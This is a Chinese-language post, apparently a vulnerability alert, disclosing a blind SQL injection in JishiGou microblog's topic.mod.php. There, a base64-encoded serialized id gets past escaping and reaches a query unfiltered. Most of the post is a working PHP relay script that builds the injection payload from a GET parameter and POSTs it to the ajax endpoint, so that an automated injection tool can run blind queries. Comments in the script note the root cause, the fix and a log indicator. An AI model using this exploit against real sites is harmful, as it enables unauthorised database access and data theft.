记事狗微博最新注入漏洞预警 -电脑资料


   

    /modules/ajax/topic.mod.php

   

function Pic_ajax()    {//echo 11;    //echo base64_encode(serialize(array('a'=>'0\'#')));        $options = array();        $TopicListLogic = Load::logic('topic_list', 1);        $per_page_num = $this->Post['pp_num'] ? (int)$this->Post['pp_num'] : 20;        $cache_time = $this->Post['c_time'] ? (int)$this->Post['c_time'] : 10;        $uid = $this->Post['uid'] ? $this->Post['uid'] : '';        if($this->Code =='channel'){            $id = $this->Post['id'] ? $this->Post['id'] : ''; //获取            $options = array(                'item'=>'channel',                'item_id' => unserialize(base64_decode($id)),//解码,应为Base64所以无视Gpc,


。。                'perpage' => $per_page_num,            );            $info = $TopicListLogic->get_data($options);//查询函数 里面也没做任何过滤

    test

   

可能注入起来比较麻烦

    因为没有回显，只能盲注，

    所以我写了个中转程序 丢工具跑

   

<?php
// Author's relay script for the topic.mod.php issue described above, kept as written.
// Defensive reading: the server-side root cause is `unserialize(base64_decode($id))`
// passing an unvalidated item_id into the query, so magic_quotes/GPC escaping never
// sees the payload; the fix belongs in topic.mod.php (validate item_id as an integer,
// never unserialize() request input, parameterise the query). For detection, a
// base64-wrapped serialized string in the `id` field of this ajax endpoint is the
// request-log indicator.
$data=base64_encode(serialize(array('a'=>'0\') and 1='.$_GET[id].'#'))); // NOTE: bare `id` is an undefined constant, treated as the string 'id' (PHP emits a notice)
$flag = 0;
$post = '';
$errno = '';
$errstr = '';
$host='127.0.0.1'; // target host as written by the author (local test instance)
$path='/jsg';
$argv = array(
  'id'=>$data,
);
// Build the urlencoded body; '&' is only prepended once a previous field was emitted,
// so with the single 'id' key the body is just id=<value>.
foreach ($argv as $key=>$value) {
  if ($flag!=0) {
      $post .= "&";
      $flag = 1;
  }
  $post.= $key."=";
  $post.= urlencode($value);
  $flag = 1;
}
$length = strlen($post);
// open the TCP connection to the target host (10 s timeout), abort on failure
$fp = fsockopen("$host",80,$errno,$errstr,10) or exit($errstr."--->".$errno);
// build the POST request headers
$header  = "POST {$path}/ajax.php?mod=topic&code=channel HTTP/1.1\r\n";
$header .= "Host: {$host}\r\n";
$header .= "Referer: /flandy/post.php\r\n";
$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
$header .= "Content-Length: ".$length."\r\n";
$header .= "Connection: Close\r\n\r\n";
// append the urlencoded POST body
$header .= $post."\r\n";
// send the request
fputs($fp,$header);
$inheader = 1;
while (!feof($fp)) {
    $line = fgets($fp,1024); // strip the response headers; only the page body is echoed
    if ($inheader && ($line == "\n" || $line == "\r\n")) {
      $inheader = 0;
    }
    if ($inheader == 0) {
    echo $line;
    }
}
fclose($fp);
?>

    跑起来的速度还凑合

   
